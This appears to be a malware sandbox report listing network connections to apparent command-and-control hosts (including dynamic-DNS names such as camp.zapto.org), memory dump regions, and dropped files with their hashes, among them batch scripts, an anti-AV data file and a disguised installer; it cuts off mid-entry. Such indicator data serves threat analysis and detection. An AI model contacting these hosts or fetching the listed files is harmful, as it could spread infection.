US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
TJ 109.74.69.43:40500 udp
US 26.185.184.104:942 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 43.69.74.109.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
TR 91.93.138.14:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 14.138.93.91.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
SY 188.160.12.49:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
IR 2.179.117.33:40500 udp
US 8.8.8.8:53 33.117.179.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 26.185.184.104:942 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
KZ 37.150.154.178:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 178.154.150.37.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 193.161.193.99:25170 tcp
RU 185.215.113.67:21405 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.160.12:40500 udp
US 8.8.8.8:53 12.160.156.90.in-addr.arpa udp
UZ 213.230.108.92:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
YE 134.35.126.112:40500 udp
US 8.8.8.8:53 112.126.35.134.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
NL 178.132.2.10:4000 tcp
IR 37.254.96.229:40500 udp
N/A 127.0.0.1:8777 tcp
SY 82.137.244.65:40500 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 229.96.254.37.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp

Files

memory/4504-4-0x00007FFCC5D73000-0x00007FFCC5D75000-memory.dmp

memory/4504-5-0x0000000000750000-0x0000000000758000-memory.dmp

memory/4504-6-0x00007FFCC5D70000-0x00007FFCC6831000-memory.dmp

memory/4288-7-0x0000000000AC0000-0x0000000000AC8000-memory.dmp

memory/4288-8-0x0000000005470000-0x000000000550C000-memory.dmp

C:\Users\Admin\Desktop\Files\surfex.exe

MD5 1f4b0637137572a1fb34aaa033149506
SHA1 c209c9a60a752bc7980a3d9d53daf4b4b32973a9
SHA256 60c645c0a668c13ad36d2d5b67777dedf992e392e652e7f0519f21d658254648
SHA512 4fd27293437b8bf77d15d993da2b0e75c9fba93bd5f94dad439a3e2e4c16c444f6a32543271f1d2ad79c220354b23301e544765ca392fc156267a89338452e86

memory/2536-20-0x0000000000560000-0x00000000005B4000-memory.dmp

memory/1772-22-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1772-24-0x0000000005800000-0x0000000005DA4000-memory.dmp

memory/1772-25-0x00000000052F0000-0x0000000005382000-memory.dmp

memory/1772-26-0x0000000005270000-0x000000000527A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp500F.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/1772-43-0x0000000005FB0000-0x0000000006026000-memory.dmp

memory/1772-44-0x0000000006750000-0x000000000676E000-memory.dmp

memory/1772-47-0x0000000006D90000-0x00000000073A8000-memory.dmp

memory/1772-48-0x00000000068E0000-0x00000000069EA000-memory.dmp

memory/1772-49-0x0000000006820000-0x0000000006832000-memory.dmp

memory/1772-50-0x0000000006880000-0x00000000068BC000-memory.dmp

memory/1772-51-0x00000000069F0000-0x0000000006A3C000-memory.dmp

memory/4504-52-0x00007FFCC5D73000-0x00007FFCC5D75000-memory.dmp

memory/4504-53-0x00007FFCC5D70000-0x00007FFCC6831000-memory.dmp

C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

MD5 3a425626cbd40345f5b8dddd6b2b9efa
SHA1 7b50e108e293e54c15dce816552356f424eea97a
SHA256 ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
SHA512 a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

C:\Users\Admin\Desktop\New Text Document mod.exse\a\u1w30Wt.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

MD5 52a3c7712a84a0f17e9602828bf2e86d
SHA1 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2
SHA256 afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288
SHA512 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac

memory/4664-85-0x000001F7618D0000-0x000001F7618E8000-memory.dmp

memory/4664-86-0x000001F77BEF0000-0x000001F77C0B2000-memory.dmp

memory/4664-87-0x000001F77D170000-0x000001F77D698000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 3626532127e3066df98e34c3d56a1869
SHA1 5fa7102f02615afde4efd4ed091744e842c63f78
SHA256 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca
SHA512 dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 045b0a3d5be6f10ddf19ae6d92dfdd70
SHA1 0387715b6681d7097d372cd0005b664f76c933c7
SHA256 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d
SHA512 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 cea368fc334a9aec1ecff4b15612e5b0
SHA1 493d23f72731bb570d904014ffdacbba2334ce26
SHA256 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541
SHA512 bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 0dc4014facf82aa027904c1be1d403c1
SHA1 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831
SHA256 a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7
SHA512 cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 b7d1e04629bec112923446fda5391731
SHA1 814055286f963ddaa5bf3019821cb8a565b56cb8
SHA256 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789
SHA512 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 7187cc2643affab4ca29d92251c96dee
SHA1 ab0a4de90a14551834e12bb2c8c6b9ee517acaf4
SHA256 c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830
SHA512 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 5eb39ba3698c99891a6b6eb036cfb653
SHA1 d2f1cdd59669f006a2f1aa9214aeed48bc88c06e
SHA256 e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2
SHA512 6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 5404286ec7853897b3ba00adf824d6c1
SHA1 39e543e08b34311b82f6e909e1e67e2f4afec551
SHA256 ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266
SHA512 c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5659eba6a774f9d5322f249ad989114a
SHA1 4bfb12aa98a1dc2206baa0ac611877b815810e4c
SHA256 e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4
SHA512 f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4

C:\Users\Admin\AppData\Local\Temp\main\extracted\in.exe

MD5 83d75087c9bf6e4f07c36e550731ccde
SHA1 d5ff596961cce5f03f842cfd8f27dde6f124e3ae
SHA256 46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f
SHA512 044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 579a63bebccbacab8f14132f9fc31b89
SHA1 fca8a51077d352741a9c1ff8a493064ef5052f27
SHA256 0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0
SHA512 4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

memory/4304-150-0x00007FF634E60000-0x00007FF6352F0000-memory.dmp

memory/4304-152-0x00007FF634E60000-0x00007FF6352F0000-memory.dmp

memory/1696-156-0x000002B49F8B0000-0x000002B49F8D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43hnnz1t.2lu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\surfex.exe.log

MD5 84cfdb4b995b1dbf543b26b86c863adc
SHA1 d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256 d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512 485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\76b53b3ec448f7ccdda2063b15d2bfc3_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

MD5 95a6a7c7899095edc189480a9904c0ce
SHA1 dd86d52d306763b7c7bf719c063cedb586878f4d
SHA256 48d1496b5129adf774d3667902cd0e6b32b459d0b35a310137498d2589f85d89
SHA512 ba11187c25ff37527a4cbddc1f5af98ec97bca5321de11de844d17d25a65fd787c88c13d1c020b67718cd63a7f0d3e0264ff8badd1701e68938af5b0dc87d2d1

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 a268d115ecab661ba67bdf6aaff9dc80
SHA1 a9a60e9b30c29872f3c31acf3c899e66dd02cb89
SHA256 98a5373e33681b3f9a448f58fb8957217cbb8a35326dad8a3b0acfed734b2eb0
SHA512 ee3c11823960f76aa2fed1c414dcbb92e671f8acfe0574334e7dbae4f7e52eb3a2e500c5486d6f11865c284fef0ea735f161c1ca32c5c6605d606603f3ab283d

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 4deec5071395c7fbdd39221afe5de2bb
SHA1 9b14d2e89f40b9b5c8bd959dfb2bceffaf4d53eb
SHA256 3873f56bbdb60e9dcf5446439419735c32c1586a75732e82e317a732d35d024d
SHA512 8e2f6531a28862500e2d38268f89f65b055c0caa6cdb602c53588d201c7a64c3f4910606dbabb7e56caa84fec1cdb38234af4f8912fae3f9bb02bcaa9db91c16

memory/1696-191-0x000002B49FBE0000-0x000002B49FD2E000-memory.dmp

memory/3796-240-0x00007FF712100000-0x00007FF712590000-memory.dmp

memory/3012-239-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3012-241-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3012-243-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3012-244-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3012-242-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3012-246-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3012-245-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3012-247-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3012-251-0x0000000140000000-0x0000000140770000-memory.dmp

memory/3796-252-0x00007FF712100000-0x00007FF712590000-memory.dmp

memory/3012-250-0x0000000002780000-0x00000000027A0000-memory.dmp

memory/3012-249-0x0000000140000000-0x0000000140770000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 227556da5e65f6819f477756808c17e4
SHA1 6ffce766e881ca2a60180bb25f4981b183f78279
SHA256 101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4
SHA512 d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

MD5 d68f79c459ee4ae03b76fa5ba151a41f
SHA1 bfa641085d59d58993ba98ac9ee376f898ee5f7b
SHA256 aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6
SHA512 bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e

memory/3012-279-0x0000000140000000-0x0000000140770000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe

MD5 63c4e3f9c7383d039ab4af449372c17f
SHA1 f52ff760a098a006c41269ff73abb633b811f18e
SHA256 151524f6c1d1aeac530cfd69de15c3336043dc8eb3f5aeaa31513e24bfd7acdd
SHA512 dcfb4804c5569ad13e752270d13320f8769601b7092544741e35bc62a22af363b7a5ea7c5a65132c9575540a3e689a6946110502bd0f046385b8739e81761fbf

C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\Desktop\Files\Identification-1.exe

MD5 c7cd553e6da67a35d029070a475da837
SHA1 bb7903f5588bb39ac4cae2d96a9d762a55723b0b
SHA256 d123bd0ec22d7ba6449474a717613b2186d812295965044ac432983df364aa91
SHA512 65f9f23611b14e2e07cd61d8e9b825ddab0dc4ac656b8b632446cb214832b043e13342c5b78fcdf981328521c5be4152be8aef3a444732d06c4ccd1dc897021b

memory/2184-324-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2184-326-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2184-325-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2184-323-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2184-322-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2184-321-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2184-320-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2184-313-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2184-319-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2512-328-0x000001E1B60C0000-0x000001E1B620E000-memory.dmp

C:\Users\Admin\Desktop\Files\87f3f2.exe

MD5 57ad05a16763721af8dae3e699d93055
SHA1 32dd622b2e7d742403fe3eb83dfa84048897f21b
SHA256 c8d6dfb7d901f25e97d475dc1564fdbfbfcaea2fe0d0aed44b7d41d77efaa7ea
SHA512 112ee88425af4afd0219ab72f273e506283b0705fbac973f7995a334b277d7ee6788fbf8e824c5988d373ac3baf865590a53e3dc10df0751df29e8a7646c47ae

memory/2800-338-0x0000000000200000-0x000000000022A000-memory.dmp

memory/2800-339-0x00000000024C0000-0x00000000024C6000-memory.dmp

memory/3984-345-0x00000000003D0000-0x00000000003E4000-memory.dmp

memory/2184-353-0x0000000140000000-0x0000000140278000-memory.dmp

C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe

MD5 12c766cab30c7a0ef110f0199beda18b
SHA1 efdc8eb63df5aae563c7153c3bd607812debeba4
SHA256 7b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316
SHA512 32cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10

C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe

MD5 7f69b1fa6c0a0fe8252b40794adc49c6
SHA1 5d1b7a341b1af20eae2cae8732f902a87a04b12b
SHA256 68662d24f56c624dee35c36010f923a8bf8d14b8c779ad3dafe8dd6b81bb3431
SHA512 6a9e13e0b1c1b0c8fbf41c94147c7cf16a41af7bd656dc606c1ca1dc8bc0986785252155661d19cc2f9ec35b26fb47456d842bc5fdf469bdd09f72d48b3a5256

memory/4744-378-0x0000000000400000-0x00000000004DD000-memory.dmp

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

MD5 258fbac30b692b9c6dc7037fc8d371f4
SHA1 ec2daa22663bd50b63316f1df0b24bdcf203f2d9
SHA256 1c1cc887675c501201f7074794a443c3eb56bcd3d25980e4ef65e9b69d44c427
SHA512 9a4a810cf5c9232762149e8ec4677da7d4a58835174e504614d7aea09926ab084b574dab85c060fa2306e3423112c29455806d6c32db86e401573eb3f24ce0e4

memory/2184-392-0x0000000000400000-0x0000000000C1F000-memory.dmp

memory/5012-393-0x00000000004B0000-0x0000000000720000-memory.dmp

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

MD5 3567cb15156760b2f111512ffdbc1451
SHA1 2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512 e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

memory/2184-454-0x0000000140000000-0x0000000140278000-memory.dmp

memory/2828-463-0x00007FF79C0A0000-0x00007FF79C530000-memory.dmp

memory/2828-461-0x00007FF79C0A0000-0x00007FF79C530000-memory.dmp

memory/648-486-0x0000000000400000-0x00000000007BD000-memory.dmp

memory/5000-488-0x0000025C70410000-0x0000025C7055E000-memory.dmp

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe

MD5 2a78ce9f3872f5e591d643459cabe476
SHA1 9ac947dfc71a868bc9c2eb2bd78dfb433067682e
SHA256 21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae
SHA512 03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

memory/4744-513-0x0000000000400000-0x00000000004DD000-memory.dmp

memory/3304-514-0x0000000000400000-0x0000000000694000-memory.dmp

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

MD5 53e54ac43786c11e0dde9db8f4eb27ab
SHA1 9c5768d5ee037e90da77f174ef9401970060520e
SHA256 2f606d24809902af1bb9cb59c16a2c82960d95bff923ea26f6a42076772f1db8
SHA512 cd1f6d5f4d8cd19226151b6674124ab1e10950af5a049e8c082531867d71bfae9d7bc65641171fd55d203e4fba9756c80d11906d85a30b35ee4e8991adb21950

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

MD5 f89267b24ecf471c16add613cec34473
SHA1 c3aad9d69a3848cedb8912e237b06d21e1e9974f
SHA256 21f12abb6de14e72d085bc0bd90d630956c399433e85275c4c144cd9818cbf92
SHA512 c29176c7e1d58dd4e1deafcbd72956b8c27e923fb79d511ee244c91777d3b3e41d0c3977a8a9fbe094bac371253481dde5b58abf4f2df989f303e5d262e1ce4d

C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmd

MD5 68cecdf24aa2fd011ece466f00ef8450
SHA1 2f859046187e0d5286d0566fac590b1836f6e1b7
SHA256 64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770
SHA512 471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c

C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe

MD5 b6027fc15cb0e74dc1968cc286648516
SHA1 94b90b4e411cb6e6f008ce28130a2964f49417ac
SHA256 773c11dcfd97fd7502c36efa1fc2dd8e7d3a68f22206e3b4a9da5ca30dafb873
SHA512 a5c6b49b9ea4520272b374e26c7b8d489d56fd1baa26cf8e428508bb3cf9f95726d5680441dc65ec5cbf76a2cca96fc26a08f0314a96710bc808a68da349920e

memory/3304-583-0x0000000000400000-0x0000000000694000-memory.dmp

C:\Users\Admin\Desktop\Files\onetap.exe

MD5 fadf16a672e4f4af21b0e364a56897c3
SHA1 53e8b0863492525e17b5ce4ff99fb73a20544b87
SHA256 21314041b5b17d156a68d246935ab476d3532a1c9c72a39b02d98a6b7ef59473
SHA512 d9b756b98fcb1451431223b40e46c03f580dc713f445d3a4ff694784df3d8fff3d40985dd792d1bae717d5eca00c1471b1b628837267ee583386f5abcddac3f5

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe

MD5 3b8b3018e3283830627249d26305419d
SHA1 40fa5ef5594f9e32810c023aba5b6b8cea82f680
SHA256 258e444e78225f74d47ba4698d49a33e6d1f6ed1f3f710186be426078e2bf1cb
SHA512 2e9a42e53406446b503f150abfa16b994ee34211830d14ccbfbf52d86019dc5cca95c40222e5c6aed910c90988f999560ff972c575f9c207d7834abba6f04aa0

memory/1876-594-0x0000000000400000-0x0000000000A9C000-memory.dmp

memory/4408-597-0x0000000000400000-0x0000000000421000-memory.dmp

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

MD5 c5ad2e085a9ff5c605572215c40029e1
SHA1 252fe2d36d552bcf8752be2bdd62eb7711d3b2ab
SHA256 47c8723d2034a43fb63f89e2bcd731c99c1c316b238957720c761a0301202e05
SHA512 8878a0f2678908136158f3a6d88393e6831dfe1e64aa82adbb17c26b223381d5ac166dc241bedd554c8dd4e687e9bee624a91fbe3d2976ddfea1d811bf26f6d4

memory/1528-615-0x0000000000850000-0x000000000096A000-memory.dmp

memory/1528-616-0x00000000051B0000-0x00000000052CA000-memory.dmp

C:\Users\Admin\Desktop\Files\Mswgoudnv.exe

MD5 de64bb0f39113e48a8499d3401461cf8
SHA1 8d78c2d4701e4596e87e3f09adde214a2a2033e8
